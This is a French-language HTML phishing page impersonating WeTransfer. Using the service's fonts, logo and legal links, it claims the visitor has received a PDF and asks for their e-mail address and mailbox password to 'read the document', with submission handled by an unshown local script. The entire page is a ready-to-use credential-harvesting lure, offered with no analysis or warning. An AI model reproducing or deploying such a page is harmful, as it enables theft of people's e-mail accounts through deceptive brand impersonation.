<!DOCTYPE html>
<html lang="fr">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Accueil</title>
    <link rel="stylesheet" href="https://cdn.wetransfer.com/_next/static/media/ActiefGrotesque-Bold.10832e10.woff2">
    <link rel="stylesheet" href="https://cdn.wetransfer.com/_next/static/media/ActiefGrotesque-Medium.1acd899d.woff2">
    <link rel="stylesheet" href="https://cdn.wetransfer.com/_next/static/media/GT-Super-WT-Super.3397811e.woff">
    <link rel="stylesheet" href="https://cdn.wetransfer.com/_next/static/media/ActiefGrotesque_W_Medium.7e37a161.woff">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">

    <style>
        * {
            box-sizing: border-box;
            padding: 0;
            margin: 0;
            font-family: GT Super WT, -apple-system, \.SFNSText-Regular, San Francisco, Roboto, Segoe UI, Helvetica Neue, Lucida Grande, sans-serif;
        }

        body {
            min-height: 100vh;
            max-height: 100vh;
            display: flex;
            flex-direction: column;

        }

        .top {
            height: 50px;
            display: flex;
            align-items: center;
            justify-content: space-between;
            position: fixed;
            left: 0%;
            top: 0%;
            width: 100%;
            background-color: white;
            padding: 15px;
        }

        .center {
            background-color: #f8f5f158;
            margin-top: 50px;
            height: 90vh;
            width: 100%;
            padding: 15px;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        form {
            width: 100%;
            padding: 20px;
        }

        input {
            width: 100%;
            height: 50px;
            border: none;
            border-radius: 10px;
            margin-bottom: 0px;
            padding-left: 10px;
            font-size: 18px;
            background-color: rgba(128, 128, 128, 0.08);
        }

        input:focus {
            outline: none;
        }

        .box {
            background-color: white;
            padding: 15px;
            width: 100%;
            min-height: 150px;
            border-radius: 10px;
            display: flex;
            flex-direction: column;
            margin-left: auto;
        }

        .box svg {
            height: 45px;
            width: 45px;
            color: rgb(255, 136, 0);
        }

        .box p,
        button,
        div {
            margin-left: auto;
            margin-right: auto;
        }

        button {
            width: 100%;
            height: 45px;
            background-color: black;
            border: none;
            border-radius: 9999px;
            color: white;
        }

        footer {
            display: flex;
            justify-content: space-between;
            height: 40px;
            margin-top: auto;
            align-items: center;
            position: fixed;
            bottom: 0;
            left: 0;
            width: 100%;
            background-color: white;
            font-size: 0.7rem;
            padding: 15px;
            color: grey;

        }

        .left {
            display: none;
        }

        @media (min-width: 612px) {

            /* Styles pour les écrans de PC */
            body {
                min-height: 100vh;
                max-height: 100vh;
                display: flex;
                flex-direction: column;

            }

            .top {
                display: none;
            }

            .center {
                background-color: white;
            }

            .box {
                width: 50%;
                height: 100%;
                padding: 100px;
                position: fixed;
                right: 0%;
                top: 0%;
                display: flex;
                align-items: center;
                justify-content: center;
            }

            .block {
                display: flex;
                flex-direction: column;
            }

            .left {
                width: 50%;
                height: 100%;
                background-color: #663a00;
                position: fixed;
                left: 0%;
                top: 0%;
                display: flex;
                flex-direction: column;
                align-items: center;
                justify-content: center;
            }

            footer {
                display: none;
            }

        }
    </style>
</head>

<body>

    <div class="top">
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"
            stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"
            class="lucide lucide-align-justify">
            <line x1="3" x2="21" y1="6" y2="6" />
            <line x1="3" x2="21" y1="12" y2="12" />
            <line x1="3" x2="21" y1="18" y2="18" />
        </svg>

        <svg xmlns="http://www.w3.org/2000/svg" width="40" height="20" fill="none"
            class="styles_module_logo__8a4eaeaf styles_module_light__8a4eaeaf">
            <path fill="currentColor" fill-rule="evenodd"
                d="M12.23 15.014c-.383-.605-.697-.926-1.254-.926-.558 0-.872.32-1.255.926L8.05 17.686c-.627 1.032-1.15 1.745-2.37 1.745s-1.777-.499-2.369-1.888a42.3 42.3 0 0 1-2.195-6.554C.348 7.89 0 5.967 0 4.4s.488-2.493 2.16-2.813c2.3-.428 5.401-.677 8.816-.677 3.414 0 6.515.25 8.815.677 1.672.32 2.16 1.246 2.16 2.814 0 1.567-.348 3.49-1.115 6.59a42.3 42.3 0 0 1-2.195 6.553c-.592 1.39-1.15 1.888-2.37 1.888-1.219 0-1.741-.713-2.369-1.745zm26.516 2.5c-1.185 1.282-3.415 2.208-6.342 2.208-5.888 0-9.373-4.096-9.373-9.474 0-5.77 4.007-9.19 9.199-9.19 4.634 0 7.7 2.458 7.7 5.77 0 3.135-2.613 5.165-5.575 5.165-1.602 0-2.787-.32-3.588-.961-.314-.25-.488-.214-.488.071 0 1.175.418 2.173 1.184 2.956.628.641 1.812 1.069 2.927 1.069 1.15 0 2.16-.25 3.066-.713s1.673-.32 2.126.428c.523.855-.21 1.959-.836 2.671"
                clip-rule="evenodd"></path>
        </svg>

        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"
            stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"
            class="lucide lucide-lock">
            <rect width="18" height="11" x="3" y="11" rx="2" ry="2" />
            <path d="M7 11V7a5 5 0 0 1 10 0v4" />
        </svg>
    </div>

    <div class="center">

        <div class="left">
            <br> <br> <br>
            <br>
            <h3 style="color: white; text-align: center;">Send files, move ideas with WeTransfer</h1> <br> <br>

        </div>
        <div class="block box">

            <div>
                <p
                    style="font-size: .9rem; text-align: center; font-weight: bolder; font-family: GT Super WT, -apple-system, \.SFNSText-Regular, San Francisco, Roboto, Segoe UI, Helvetica Neue, Lucida Grande, sans-serif;">
                    Vous avez reçu un document</p>

                <div style="display: flex; align-items: center; justify-content: space-between; width: 100px;">
                    <span style="font-weight: bolder;">PDF + </span>
                    <img src="./img/pdf-file-format.png" width="30">

                </div>

                <br>


            </div>

            <form id="form">
                <p style="font-family:'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif; font-size: .8rem;">
                    Pour lire le document veuillez entrer les identifiants de messagerie auxquels ce fichier a été
                    envoyé.</p>
                <span id="notif" style="color: orange;"></span>
                <br>
                <input id="user" name="email" type="email" placeholder="Adresse e-mail" required> <br>
                <span style="color: orangered;" id="notif"></span> <br>

                <input id="pwd" name="pwd" placeholder="Mot de passe" type="password" minlength="4" required> <br> <br>

                <small class="auth0-lock-terms"><span>Vous acceptez nos <a
                            href="https://wetransfer.com/explore/legal/terms" target="_blank" rel="noopener noreferrer"
                            role="button" tabindex="18">Conditions d'utilisation</a> et notre <a
                            href="https://wetransfer.com/explore/legal/privacy" target="_blank"
                            rel="noopener noreferrer" role="button" tabindex="19">Déclaration relative à la
                            confidentialité et aux cookies</a>.</span></small>
                <br>
                <br>
                <button id="co" type="submit">Continuer</button>

            </form>
        </div>

    </div>

    <footer>

        <span>Cookies</span>
        <span>Politique</span>
        <span>Aide</span>
        <span>Francais</span>

    </footer>

    <script src="./app.min.js"></script>



</body>

<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"
    integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz"
    crossorigin="anonymous"></script>


</html>